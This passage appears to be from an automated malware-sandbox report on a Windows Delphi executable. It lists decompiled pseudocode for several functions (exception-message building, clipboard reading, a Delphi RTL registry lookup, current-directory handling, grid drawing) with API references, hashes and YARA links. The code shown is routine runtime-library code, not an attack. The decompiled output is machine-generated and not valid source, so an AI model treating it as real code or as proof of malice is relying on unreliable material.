                                                                        • Opcode Fuzzy Hash: 675b2fcfc3af4e0b804cb0a88e9fa82d5beafd49b275f10cabf8e41c51dc7240
                                                                        • Instruction Fuzzy Hash: CA412E70A002589BDB21DF69CD85BDAB7BCAB08304F0040FAA548F7292D7799F948F59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409F3E, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00409F3E(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t77;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L3:
					_t40 =  *0x496714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409F34(_t74);
				} else {
					_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
					_t101 = _t72;
					if(_t72 != 0) {
						_t77 = _t74 - _v820.AllocationBase;
						__eflags = _t77;
						_v12 = _t77;
					} else {
						goto L3;
					}
				}
				E00408C5C( &_v273, 0x104, E0040ACE8(0x5c, _t101) + 1);
				_t75 = 0x40a0c0;
				_t89 = 0x40a0c0;
				_t85 =  *0x4077d4; // 0x407820
				if(E00403768(_t92, _t85) != 0) {
					_t75 = E004047F8( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00408BF8(_t75, 0x40a0c0);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a0c4;
					}
				}
				_t51 =  *0x495c1c; // 0x407594
				_t16 = _t51 + 4; // 0xffe7
				_t53 =  *0x496714; // 0x400000
				LoadStringA(E00405AAC(_t53),  *_t16,  &_v790, 0x100);
				E0040352C( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E0040932C(_v8,  &_v790, _a4, 4,  &_v860);
				return E00408BF8(_v8, _t89);
			}
































                                                                        0x00409f4c
                                                                        0x00409f4f
                                                                        0x00409f51
                                                                        0x00409f5d
                                                                        0x00409f6c
                                                                        0x00409f8a
                                                                        0x00409f96
                                                                        0x00409f9c
                                                                        0x00409fa8
                                                                        0x00409f6e
                                                                        0x00409f81
                                                                        0x00409f86
                                                                        0x00409f88
                                                                        0x00409fad
                                                                        0x00409fad
                                                                        0x00409fb3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00409f88
                                                                        0x00409fd1
                                                                        0x00409fd6
                                                                        0x00409fdb
                                                                        0x00409fe2
                                                                        0x00409fef
                                                                        0x00409ff9
                                                                        0x00409ffd
                                                                        0x0040a004
                                                                        0x0040a00d
                                                                        0x0040a00d
                                                                        0x0040a004
                                                                        0x0040a01e
                                                                        0x0040a023
                                                                        0x0040a027
                                                                        0x0040a032
                                                                        0x0040a03f
                                                                        0x0040a04a
                                                                        0x0040a050
                                                                        0x0040a05d
                                                                        0x0040a063
                                                                        0x0040a06d
                                                                        0x0040a073
                                                                        0x0040a07a
                                                                        0x0040a080
                                                                        0x0040a087
                                                                        0x0040a08d
                                                                        0x0040a0a9
                                                                        0x0040a0bc

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F5D
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F81
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F9C
                                                                        • LoadStringA.USER32 ref: 0040A032
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                        • String ID: x@
                                                                        • API String ID: 3990497365-1446391196
                                                                        • Opcode ID: 9a548920c42f45fa99c43c4b2d529c9c7306f1bd2938faf4c3a7a4c4b8425f55
                                                                        • Instruction ID: ae1d460a213a262a2de6a5e3c25968941e4e7f8d5fcce27913c57a7a7444fe46
                                                                        • Opcode Fuzzy Hash: 9a548920c42f45fa99c43c4b2d529c9c7306f1bd2938faf4c3a7a4c4b8425f55
                                                                        • Instruction Fuzzy Hash: 36412F70A002589BDB21DF69CD85BDAB7BCAB08304F0040FAB548F7292D7799F948F59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042FBE8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66clipboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E0042FBE8(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				void* __ecx;
				void* __ebp;
				void* _t16;
				void* _t20;
				void* _t24;
				void* _t25;
				signed short _t26;
				void* _t28;
				intOrPtr _t29;
				intOrPtr _t38;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t48;
				intOrPtr _t51;

				_t43 = __edx;
				_v8 = __eax;
				 *((intOrPtr*)( *_v8 + 0x18))(_t42, _t45, _t25, _t28, _t48);
				_push(_t51);
				_push(0x42fc8a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t51;
				_t26 = EnumClipboardFormats(0);
				_t52 = _t26;
				if(_t26 == 0) {
					L4:
					_t29 =  *0x495908; // 0x41d78c
					E0040A238(_t29, 1);
					E00403DA8();
					__eflags = 0;
					_pop(_t38);
					 *[fs:eax] = _t38;
					return  *((intOrPtr*)( *_v8 + 0x14))(0x42fc91);
				} else {
					while(1) {
						_t16 = E004224D0(_t26, _t52);
						_t53 = _t16;
						if(_t16 != 0) {
							break;
						}
						_t26 = EnumClipboardFormats(_t26 & 0x0000ffff);
						__eflags = _t26;
						if(__eflags != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					_t20 = GetClipboardData(_t26 & 0x0000ffff);
					E004223E0(_t43, _t20, _t26, _t53, GetClipboardData(9));
					_t24 = E00403E54();
					return _t24;
				}
				L6:
			}



















                                                                        0x0042fbef
                                                                        0x0042fbf1
                                                                        0x0042fbf9
                                                                        0x0042fbfe
                                                                        0x0042fbff
                                                                        0x0042fc04
                                                                        0x0042fc07
                                                                        0x0042fc11
                                                                        0x0042fc13
                                                                        0x0042fc16
                                                                        0x0042fc5d
                                                                        0x0042fc5d
                                                                        0x0042fc6a
                                                                        0x0042fc6f
                                                                        0x0042fc74
                                                                        0x0042fc76
                                                                        0x0042fc79
                                                                        0x0042fc89
                                                                        0x0042fc18
                                                                        0x0042fc18
                                                                        0x0042fc1f
                                                                        0x0042fc24
                                                                        0x0042fc26
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042fc56
                                                                        0x0042fc58
                                                                        0x0042fc5b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042fc5b
                                                                        0x0042fc2c
                                                                        0x0042fc41
                                                                        0x0042fc46
                                                                        0x0042fc96
                                                                        0x0042fc96
                                                                        0x00000000

                                                                        APIs
                                                                        • EnumClipboardFormats.USER32(00000000,00000000,0042FC8A), ref: 0042FC0C
                                                                        • GetClipboardData.USER32 ref: 0042FC2C
                                                                        • GetClipboardData.USER32 ref: 0042FC35
                                                                        • EnumClipboardFormats.USER32(00000000,00000000,00000000,0042FC8A), ref: 0042FC51
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Clipboard$DataEnumFormats
                                                                        • String ID: x@
                                                                        • API String ID: 1256399260-1446391196
                                                                        • Opcode ID: 5a6158a96a4f1d023fa36d5631eca6709ac33564e94456df72d8ef5d7ea42a59
                                                                        • Instruction ID: 6727d5747eb2cfb6d4763b554848f51aca0207427aa4671af987d0115a5538be
                                                                        • Opcode Fuzzy Hash: 5a6158a96a4f1d023fa36d5631eca6709ac33564e94456df72d8ef5d7ea42a59
                                                                        • Instruction Fuzzy Hash: CC110630704214AFD700FF6BE95292A77E9EF853587A0407BFC04D7381C939AC05D669
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403454, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 65%
                                                                        			E00403454() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x47a00c & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x47a00c; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x47a00c = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E004034C5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4034cc);
					return RegCloseKey(_v8);
				}
			}












                                                                        0x00403455
                                                                        0x00403457
                                                                        0x00403461
                                                                        0x0040347d
                                                                        0x004034cc
                                                                        0x004034de
                                                                        0x004034e1
                                                                        0x004034ea
                                                                        0x0040347f
                                                                        0x00403481
                                                                        0x00403482
                                                                        0x00403487
                                                                        0x0040348a
                                                                        0x0040348d
                                                                        0x004034a9
                                                                        0x004034b0
                                                                        0x004034b3
                                                                        0x004034b6
                                                                        0x004034c4
                                                                        0x004034c4

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403476
                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034A9
                                                                        • RegCloseKey.ADVAPI32(?,004034CC,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034BF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                        • API String ID: 3677997916-4173385793
                                                                        • Opcode ID: 350ae91fbd18333f4bfa6cae6bba187b28a893344676598df037652048d21920
                                                                        • Instruction ID: 120532c505e53d0c70db7bdd28f63d547cb0a312e52158abe3e5b934d02c6540
                                                                        • Opcode Fuzzy Hash: 350ae91fbd18333f4bfa6cae6bba187b28a893344676598df037652048d21920
                                                                        • Instruction Fuzzy Hash: F001B575510308BAE711EF91CC42BAE7BACD704B05F1045B6F908F65D0E6799A10C75C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402924, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00402924(void* __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				void* _t21;
				void* _t25;
				CHAR* _t26;

				_t25 = __edx;
				_t21 = __eax;
				if(__eax != 0) {
					 *_t26 = 0x40;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t26);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t21 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E004045B0(_t25, 0x105,  &_v532);
			}










                                                                        0x0040292c
                                                                        0x0040292e
                                                                        0x00402932
                                                                        0x0040293c
                                                                        0x0040293f
                                                                        0x00402944
                                                                        0x00402956
                                                                        0x0040295c
                                                                        0x0040295c
                                                                        0x0040296b
                                                                        0x00402972
                                                                        0x0040297c
                                                                        0x0040297c
                                                                        0x00402999

                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046650B), ref: 00402956
                                                                        • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046650B), ref: 0040295C
                                                                        • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046650B), ref: 0040296B
                                                                        • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046650B), ref: 0040297C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CurrentDirectory
                                                                        • String ID: :
                                                                        • API String ID: 1611563598-336475711
                                                                        • Opcode ID: d2c8346d54f6d26374d7a20a1d44905b814254075feb8a7149b64a100b0b6c82
                                                                        • Instruction ID: 65af94f08173e3417ccc1a5c10f762e489d2bb018a98be52c56f19f3046a90dd
                                                                        • Opcode Fuzzy Hash: d2c8346d54f6d26374d7a20a1d44905b814254075feb8a7149b64a100b0b6c82
                                                                        • Instruction Fuzzy Hash: 01F096622487805ED310E6788856BDB73DC9F55704F04846EBAC8E73C2F6B889449767
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045CDD8, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E0045CDD8(signed int __eax, long __ecx, char __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				long _v12;
				char _v16;
				signed int _v17;
				struct tagRECT _v33;
				struct tagRECT _v49;
				struct tagRECT _v65;
				void* __edi;
				void* __ebp;
				intOrPtr _t138;
				intOrPtr _t148;
				signed int _t163;
				signed int _t166;
				intOrPtr _t167;
				intOrPtr _t180;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t183;
				signed int _t188;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr _t236;
				intOrPtr _t238;
				intOrPtr* _t240;
				signed int _t252;
				intOrPtr _t253;
				intOrPtr _t256;
				signed int _t257;
				void* _t265;

				_v12 = __ecx;
				_v8 = __eax;
				_t240 = _a24 + 0xfffffffc;
				_v16 = __edx;
				_v49.top = _a20;
				while(1) {
					_t138 = _v49.top;
					if(_t138 >= _a12) {
						break;
					}
					_t138 =  *((intOrPtr*)( *_t240 + 0x24c));
					if(_t138 > _v16) {
						_t257 = _v8;
						_v49.left = _v12;
						_v49.bottom = E004607E0( *_t240, _v16) + _v49.top;
						while(1) {
							__eflags = _v49.left - _a16;
							if(_v49.left >= _a16) {
								break;
							}
							_t148 =  *_t240;
							__eflags = _t257 -  *((intOrPtr*)(_t148 + 0x21c));
							if(_t257 <  *((intOrPtr*)(_t148 + 0x21c))) {
								_v49.right = E004607C0( *_t240, _t257) + _v49.left;
								__eflags = _v49.right - _v49.left;
								if(_v49.right <= _v49.left) {
									L39:
									_v49.left =  *((intOrPtr*)(_a24 - 0x70)) + _v49.right;
									_t257 = _t257 + 1;
									__eflags = _t257;
									continue;
								}
								__eflags = RectVisible(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
								if(__eflags == 0) {
									goto L39;
								} else {
									_v17 = _a4;
									_t163 = E0045C608( *_t240, __eflags);
									__eflags = _t163;
									if(_t163 != 0) {
										_t236 =  *_t240;
										__eflags =  *((intOrPtr*)(_t236 + 0x22c)) - _v16;
										if( *((intOrPtr*)(_t236 + 0x22c)) == _v16) {
											_t238 =  *_t240;
											__eflags = _t257 -  *((intOrPtr*)(_t238 + 0x228));
											if(_t257 ==  *((intOrPtr*)(_t238 + 0x228))) {
												_t24 =  &_v17;
												 *_t24 = _v17 | 0x00000002;
												__eflags =  *_t24;
											}
										}
									}
									_t242 = _a24 - 0x80;
									_t166 = E0045B33C(_t257, _a24 - 0x80, _v16);
									__eflags = _t166;
									if(_t166 != 0) {
										_t29 =  &_v17;
										 *_t29 = _v17 | 0x00000001;
										__eflags =  *_t29;
									}
									__eflags = _v17 & 0x00000002;
									if((_v17 & 0x00000002) == 0) {
										L14:
										_t167 =  *_t240;
										__eflags =  *((char*)(_t167 + 0x28c));
										if( *((char*)(_t167 + 0x28c)) != 0) {
											L16:
											_t260 =  *((intOrPtr*)( *_t240 + 0x208));
											E0042062C( *((intOrPtr*)( *_t240 + 0x208)));
											__eflags = _v17 & 0x00000001;
											if(__eflags == 0) {
												L20:
												E0041FC50( *((intOrPtr*)(_t260 + 0x14)), _t242, _a8, _t257, _t265, __eflags);
												L21:
												E004202E8(_t260,  &_v49);
												L22:
												 *((intOrPtr*)( *((intOrPtr*)( *_t240)) + 0xd4))(_v17,  &_v49);
												_t180 =  *_t240;
												__eflags =  *((char*)(_t180 + 0x28c));
												if( *((char*)(_t180 + 0x28c)) != 0) {
													__eflags = _v17 & 0x00000004;
													if((_v17 & 0x00000004) != 0) {
														_t201 =  *_t240;
														__eflags =  *((char*)(_t201 + 0x1a5));
														if( *((char*)(_t201 + 0x1a5)) != 0) {
															_t202 = _a24;
															_t253 = _a24;
															__eflags =  *(_t202 - 0x84) |  *(_t253 - 0x88);
															if(( *(_t202 - 0x84) |  *(_t253 - 0x88)) != 0) {
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsd");
																_t257 = _t257;
																_t205 = _a24;
																__eflags =  *(_t205 - 0x84) & 0x00000004;
																if(( *(_t205 - 0x84) & 0x00000004) != 0) {
																	_t206 = _a24;
																	__eflags =  *(_t206 - 0x84) & 0x00000008;
																	if(( *(_t206 - 0x84) & 0x00000008) == 0) {
																		_t88 =  &(_v65.bottom);
																		 *_t88 = _v65.bottom +  *((intOrPtr*)(_a24 - 0x40));
																		__eflags =  *_t88;
																	}
																} else {
																	_v65.right = _v65.right +  *((intOrPtr*)(_a24 - 0x70));
																}
																DrawEdge(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x84));
																DrawEdge(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x88));
															}
														}
													}
												}
												_t181 =  *_t240;
												__eflags =  *((char*)(_t181 + 0x28c));
												if( *((char*)(_t181 + 0x28c)) != 0) {
													_t182 =  *_t240;
													__eflags =  *(_t182 + 0x1c) & 0x00000010;
													if(( *(_t182 + 0x1c) & 0x00000010) == 0) {
														__eflags = _v17 & 0x00000002;
														if((_v17 & 0x00000002) != 0) {
															_t183 =  *_t240;
															_t252 =  *0x45d10c; // 0x2400
															__eflags = _t252 - ( *(_t183 + 0x248) &  *0x45d10c);
															if(_t252 != ( *(_t183 + 0x248) &  *0x45d10c)) {
																__eflags =  *( *_t240 + 0x249) & 0x00000010;
																if(__eflags == 0) {
																	_t188 = E004037D8( *_t240, __eflags);
																	__eflags = _t188;
																	if(_t188 != 0) {
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		_t257 = _t257;
																		_v33.left = _v49.right;
																		_v33.right = _v49.left;
																		DrawFocusRect(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v33);
																	} else {
																		DrawFocusRect(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
																	}
																}
															}
														}
													}
												}
												goto L39;
											}
											__eflags = _v17 & 0x00000002;
											if(__eflags == 0) {
												L19:
												E0041FC50( *((intOrPtr*)(_t260 + 0x14)), _t242, 0x8000000d, _t257, _t265, __eflags);
												E0041F464( *((intOrPtr*)(_t260 + 0xc)), 0x8000000e);
												goto L21;
											}
											_t256 =  *0x45d108; // 0x0
											__eflags = _t256 - ( *( *_t240 + 0x248) &  *0x45d104);
											if(__eflags == 0) {
												goto L20;
											}
											goto L19;
										}
										_t232 =  *_t240;
										__eflags =  *(_t232 + 0x1c) & 0x00000010;
										if(( *(_t232 + 0x1c) & 0x00000010) == 0) {
											goto L22;
										}
										goto L16;
									}
									_t233 =  *_t240;
									__eflags =  *(_t233 + 0x249) & 0x00000004;
									if(( *(_t233 + 0x249) & 0x00000004) == 0) {
										goto L14;
									}
									_t234 =  *_t240;
									__eflags =  *((char*)(_t234 + 0x28d));
									if( *((char*)(_t234 + 0x28d)) == 0) {
										goto L14;
									}
									_t235 =  *_t240;
									__eflags =  *(_t235 + 0x1c) & 0x00000010;
									if(( *(_t235 + 0x1c) & 0x00000010) == 0) {
										goto L39;
									}
									goto L14;
								}
							}
							break;
						}
						_v49.top =  *((intOrPtr*)(_a24 - 0x40)) + _v49.bottom;
						_t130 =  &_v16;
						 *_t130 = _v16 + 1;
						__eflags =  *_t130;
						continue;
					}
					break;
				}
				return _t138;
			}






































                                                                        0x0045cde1
                                                                        0x0045cde4
                                                                        0x0045cdea
                                                                        0x0045cded
                                                                        0x0045cdf3
                                                                        0x0045d0e1
                                                                        0x0045d0e1
                                                                        0x0045d0e7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045d0eb
                                                                        0x0045d0f4
                                                                        0x0045cdfb
                                                                        0x0045ce01
                                                                        0x0045ce11
                                                                        0x0045d0bc
                                                                        0x0045d0bf
                                                                        0x0045d0c2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045d0c4
                                                                        0x0045d0c6
                                                                        0x0045d0cc
                                                                        0x0045ce25
                                                                        0x0045ce2b
                                                                        0x0045ce2e
                                                                        0x0045d0af
                                                                        0x0045d0b8
                                                                        0x0045d0bb
                                                                        0x0045d0bb
                                                                        0x00000000
                                                                        0x0045d0bb
                                                                        0x0045ce4b
                                                                        0x0045ce4d
                                                                        0x00000000
                                                                        0x0045ce53
                                                                        0x0045ce56
                                                                        0x0045ce5b
                                                                        0x0045ce60
                                                                        0x0045ce62
                                                                        0x0045ce64
                                                                        0x0045ce6c
                                                                        0x0045ce6f
                                                                        0x0045ce71
                                                                        0x0045ce73
                                                                        0x0045ce79
                                                                        0x0045ce7b
                                                                        0x0045ce7b
                                                                        0x0045ce7b
                                                                        0x0045ce7b
                                                                        0x0045ce79
                                                                        0x0045ce6f
                                                                        0x0045ce82
                                                                        0x0045ce8a
                                                                        0x0045ce8f
                                                                        0x0045ce91
                                                                        0x0045ce93
                                                                        0x0045ce93
                                                                        0x0045ce93
                                                                        0x0045ce93
                                                                        0x0045ce97
                                                                        0x0045ce9b
                                                                        0x0045cebf
                                                                        0x0045cebf
                                                                        0x0045cec1
                                                                        0x0045cec8
                                                                        0x0045ced2
                                                                        0x0045ced4
                                                                        0x0045cee1
                                                                        0x0045cee6
                                                                        0x0045ceea
                                                                        0x0045cf2a
                                                                        0x0045cf30
                                                                        0x0045cf35
                                                                        0x0045cf3a
                                                                        0x0045cf3f
                                                                        0x0045cf50
                                                                        0x0045cf56
                                                                        0x0045cf58
                                                                        0x0045cf5f
                                                                        0x0045cf65
                                                                        0x0045cf69
                                                                        0x0045cf6f
                                                                        0x0045cf71
                                                                        0x0045cf78
                                                                        0x0045cf7e
                                                                        0x0045cf87
                                                                        0x0045cf8a
                                                                        0x0045cf90
                                                                        0x0045cf99
                                                                        0x0045cf9a
                                                                        0x0045cf9b
                                                                        0x0045cf9c
                                                                        0x0045cf9d
                                                                        0x0045cf9e
                                                                        0x0045cfa1
                                                                        0x0045cfa8
                                                                        0x0045cfb5
                                                                        0x0045cfb8
                                                                        0x0045cfbf
                                                                        0x0045cfc7
                                                                        0x0045cfc7
                                                                        0x0045cfc7
                                                                        0x0045cfc7
                                                                        0x0045cfaa
                                                                        0x0045cfb0
                                                                        0x0045cfb0
                                                                        0x0045cfe8
                                                                        0x0045d00b
                                                                        0x0045d00b
                                                                        0x0045cf90
                                                                        0x0045cf78
                                                                        0x0045cf69
                                                                        0x0045d010
                                                                        0x0045d012
                                                                        0x0045d019
                                                                        0x0045d01f
                                                                        0x0045d021
                                                                        0x0045d025
                                                                        0x0045d02b
                                                                        0x0045d02f
                                                                        0x0045d031
                                                                        0x0045d041
                                                                        0x0045d048
                                                                        0x0045d04b
                                                                        0x0045d04f
                                                                        0x0045d056
                                                                        0x0045d05e
                                                                        0x0045d063
                                                                        0x0045d065
                                                                        0x0045d087
                                                                        0x0045d088
                                                                        0x0045d089
                                                                        0x0045d08a
                                                                        0x0045d08b
                                                                        0x0045d08f
                                                                        0x0045d095
                                                                        0x0045d0aa
                                                                        0x0045d067
                                                                        0x0045d079
                                                                        0x0045d079
                                                                        0x0045d065
                                                                        0x0045d056
                                                                        0x0045d04b
                                                                        0x0045d02f
                                                                        0x0045d025
                                                                        0x00000000
                                                                        0x0045d019
                                                                        0x0045ceec
                                                                        0x0045cef0
                                                                        0x0045cf0e
                                                                        0x0045cf16
                                                                        0x0045cf23
                                                                        0x00000000
                                                                        0x0045cf23
                                                                        0x0045cf02
                                                                        0x0045cf09
                                                                        0x0045cf0c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045cf0c
                                                                        0x0045ceca
                                                                        0x0045cecc
                                                                        0x0045ced0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045ced0
                                                                        0x0045ce9d
                                                                        0x0045ce9f
                                                                        0x0045cea6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045cea8
                                                                        0x0045ceaa
                                                                        0x0045ceb1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045ceb3
                                                                        0x0045ceb5
                                                                        0x0045ceb9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045ceb9
                                                                        0x0045ce4d
                                                                        0x00000000
                                                                        0x0045d0cc
                                                                        0x0045d0db
                                                                        0x0045d0de
                                                                        0x0045d0de
                                                                        0x0045d0de
                                                                        0x00000000
                                                                        0x0045d0de
                                                                        0x00000000
                                                                        0x0045d0f4
                                                                        0x0045d100

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
